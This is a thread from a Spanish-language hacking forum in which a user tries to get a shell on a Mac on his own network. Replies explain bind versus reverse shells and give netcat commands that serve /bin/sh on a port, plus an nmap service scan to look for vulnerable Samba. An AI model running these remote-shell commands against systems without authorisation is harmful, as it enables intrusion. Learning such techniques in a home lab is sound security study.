 Autor
|
Tema: Conseguir Shell (Leído 3,409 veces)
|
frantheviking
 Desconectado
Mensajes: 4
|
Hola,
tengo dos ordenadores conectados en mi red, uno con linunx, y otro con MAC OSX.
He buscado con nmap los puertos abiertos del MAC desde mi linux, he probado a conseguir shell con mi linux en el MAC, pero sin resultados positivos.
Este es el resultado de mi nmap sobre la victima:
Nmap scan report for 192.168.1.8
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
88/tcp open kerberos-sec
139/tcp open netbios-ssn
445/tcp open microsoft-ds
515/tcp open printer
548/tcp open afp
631/tcp open ipp
Que posibilidades tengo? He hecho nc -l -p 139 y en la victima nc -e /bin/sh 192.168.1.8 139, pero de nuevo nada de nada
Gracias
|
|
|
|
|
En línea
|
|
|
|
|
RevangelyonX
|
Hola
Posibilidades ninguna.
Estas confundiendo terminos básicos de bind shell reverse shell etc.
Lo que quieres es obtener una shell de pruebas sin explotar ningun servicio. Por lo tanto el escenario puede ser el siguiente:
Vic1 escuchando un puerto y -e /bin/sh (esto es bind)
o
Vic1 conectandose a un puerto y maquina remota y -e /bin/sh (esto es reverse shell)
El problema de tu caso es que primero confundes victima con atacante. Segundo que no puedes hacer un listen en un puerto que ya esta open.
Te sugiero lo siguiente:
victima
nc -nlp 4444 -e /bin/sh
atacante
nc ip.dd.victima 4444
esto Es una bind shell.
Le información sobre el uso de Netcat y sus posibiliades.
Salu2
|
|
|
|
|
En línea
|
Just Linux
OSCP certified
|
|
|
adastra
Endless Learner
Ex-Staff
Desconectado
Mensajes: 885
http://thehackerway.com/
|
que version de samba esta corriendo en tu Mac?
ejecuta:
nmap -sSV -T5 -A ip
Algunas versiones de samba que corren sobre Mac son vulnerables, esa seria tu única alternativa de entrar en aquella máquina.
|
|
|
|
|
En línea
|
|
|
|
|
 |
